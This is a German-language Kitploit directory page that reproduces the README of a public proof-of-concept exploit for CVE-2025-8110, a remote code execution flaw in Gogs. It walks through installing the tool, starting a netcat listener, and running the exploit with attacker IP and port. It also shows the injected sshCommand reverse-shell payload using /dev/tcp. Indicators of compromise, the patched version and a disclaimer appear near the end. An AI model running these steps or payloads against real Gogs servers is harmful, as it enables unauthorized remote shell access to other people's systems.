Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
Tools/GitHubGitHub/x4brozer/cve-2025-8110
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gogs RCE-Exploit (CVE-2025-8110)

Python License

Proof of Concept für CVE-2025-8110 – Remotecodeausführung in Gogs über Symlink-Bypass und sshCommand-Injection.

Beschreibung

Dieser Exploit missbraucht einen Symlink-Bypass in der Gogs-API, um .git/config zu überschreiben und einen bösartigen sshCommand zu injizieren, der eine Reverse-Shell ausführt.

Anforderungen

  • Python 3.12+
  • Git installiert
  • Gültige Gogs-Anmeldedaten
  • Gogs-API-Token

Installation

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

Argument Beschreibung -u, --url Ziel-Gogs-URL (z.B. http://target:3000) -U, --username Gogs-Benutzername -P, --password Gogs-Passwort -t, --token Gogs-API-Token -lh, --host Ihre IP für Reverse-Shell -lp, --port Ihr Port für Listener -x, --proxy Proxy aktivieren (localhost:8080)

Verwendung

Schritt 1: API-Token abrufen

Melden Sie sich bei Gogs an → Einstellungen → Anwendungen → Token generieren

Schritt 2: Listener starten

root@kitploit:~
nc -lvnp 4444

Schritt 3: Exploit ausführen

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

Beispiel

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

Funktionsweise

Erstellt Repository mit Symlink zu .git/config

Verwendet PutContents-API, um in den Symlink zu schreiben

Injiziert sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Gogs führt Befehl aus → Reverse-Shell

Fehlerbehebung Problem Lösung Anmeldung fehlgeschlagen Überprüfen Sie Benutzername/Passwort Repo-Erstellung fehlgeschlagen API-Token neu generieren Lesen Timeout Normal – Listener überprüfen Keine Shell Firewall überprüfen, anderen Port versuchen

Indikatoren für Kompromittierung Zufällige 8-stellige Repository-Namen malicious_link-Symlink in Repos sshCommand in .git/config

Behebung Aktualisieren Sie auf Gogs v0.13.4 oder neuer:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

Rechtlicher Hinweis Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Unautorisierter Zugriff ist illegal.

Danksagungen Entdeckung: Wiz Research Original PoC: zAbuQasem Exploit: X4BROZER

Tool herunterladen